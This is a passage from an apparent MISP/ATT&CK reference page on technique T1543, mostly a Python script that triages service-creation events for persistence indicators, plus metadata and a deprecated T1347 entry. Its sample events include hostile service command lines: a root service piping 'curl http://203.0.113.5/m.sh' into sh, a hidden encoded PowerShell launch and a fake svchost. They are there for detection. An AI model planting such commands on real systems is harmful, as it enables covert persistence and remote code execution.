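    if platform == "windows":
        m = re.match(r'\s*"([^"]*)"(.*)$', command)
        return [m.group(1)] + m.group(2).split() if m else command.split()
    try:
        return shlex.split(command)
    except ValueError:
        return command.split()

def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()

def triage(ev: ServiceEvent, baseline: dict) -> list:
    """Return human-readable findings for one event; an empty list means nothing
    notable. `baseline` maps a known service name to its expected image path."""
    tokens = split_command(ev.command, ev.platform)
    if not tokens:
        return ["empty command line"]
    image = tokens[0]
    image_l = image.lower()
    findings = []
    if any(d in image_l for d in WRITABLE_DIRS.get(ev.platform, ())):
        if ev.account.lower() in PRIVILEGED:
            findings.append(f"runs as {ev.account} from a user-writable path: {image}")
        else:
            findings.append(f"image in a user-writable path: {image}")
    if basename(image) in INTERPRETERS.get(ev.platform, set()):
        findings.append(f"image is an interpreter/proxy: {basename(image)}; inspect arguments")
    if DOWNLOAD_EXEC.search(ev.command):
        findings.append("command fetches content from the network at start")
    if ENCODED.search(ev.command):
        findings.append("command carries encoded/base64 content")
    expected = baseline.get(ev.name)
    if expected and expected.lower() != image_l:
        findings.append(f"known service repointed: expected {expected}, now {image}")
    return findings

# Constructed baseline (what the fleet's golden image ships) and sample records.
BASELINE = {"Spooler": r"C:\Windows\System32\spoolsv.exe", "ssh.service": "/usr/sbin/sshd"}
SAMPLE_EVENTS = [
    ServiceEvent("windows", "Spooler", r"C:\Windows\System32\spoolsv.exe", "LocalSystem"),
    ServiceEvent("windows", "UpdaterHelper",
                 r'"C:\Users\Public\Libraries\svchost.exe" -k netsvcs', "LocalSystem"),
    ServiceEvent("windows", "Spooler", r"C:\ProgramData\print\spoolsv.exe", "LocalSystem"),
    ServiceEvent("windows", "SyncSvc",
                 r"C:\Windows\System32\cmd.exe /c powershell -nop -w hidden -enc "
                 "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=", "LocalSystem"),
    ServiceEvent("linux", "ssh.service", "/usr/sbin/sshd -D", "root"),
    ServiceEvent("linux", "net-monitor.service",
                 "/bin/sh -c 'curl -s http://203.0.113.5/m.sh | sh'", "root"),
    ServiceEvent("macos", "com.example.updater", "/Users/alice/Library/.cache/updater --daemon", "root"),
]

def run_triage(events=SAMPLE_EVENTS, baseline=BASELINE) -> list:
    """Pair each event with its findings, in input order."""
    return [(ev, triage(ev, baseline)) for ev in events]

if __name__ == "__main__":
    for ev, findings in run_triage():
        print(f"{ev.platform}/{ev.name}: {findings or ['ok']}")
```

The baseline comparison is what catches the "modify existing services" case: a service named Spooler is unremarkable until its image no longer matches the path the golden image installed.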

Internal MISP references

UUID 106c0cf6-bf73-4601-9aa8-0945c2715ec5 which can be used as unique global reference for Create or Modify System Process - T1543 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1543
kill_chain ['attack-Windows:persistence', 'attack-macOS:persistence', 'attack-Linux:persistence', 'attack-Containers:persistence', 'attack-Windows:privilege-escalation', 'attack-macOS:privilege-escalation', 'attack-Linux:privilege-escalation', 'attack-Containers:privilege-escalation']
mitre_data_sources ['Command: Command Execution', 'Container: Container Creation', 'Driver: Driver Load', 'File: File Creation', 'File: File Modification', 'Process: OS API Execution', 'Process: Process Creation', 'Service: Service Creation', 'Service: Service Modification', 'Windows Registry: Windows Registry Key Creation', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Windows', 'macOS', 'Linux', 'Containers']

Build and configure delivery systems - T1347

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Delivery systems are the infrastructure used by the adversary to host malware or other tools used during exploitation. Building and configuring delivery systems may include multiple activities such as registering domain names, renting hosting space, or configuring previously exploited environments. (Citation: APT1)

Internal MISP references

UUID 15ef4da5-3b93-4bb1-a39a-5396661956d3 which can be used as unique global reference for Build and configure delivery systems - T1347 in MISP communities and other software using the MISP galaxy

External references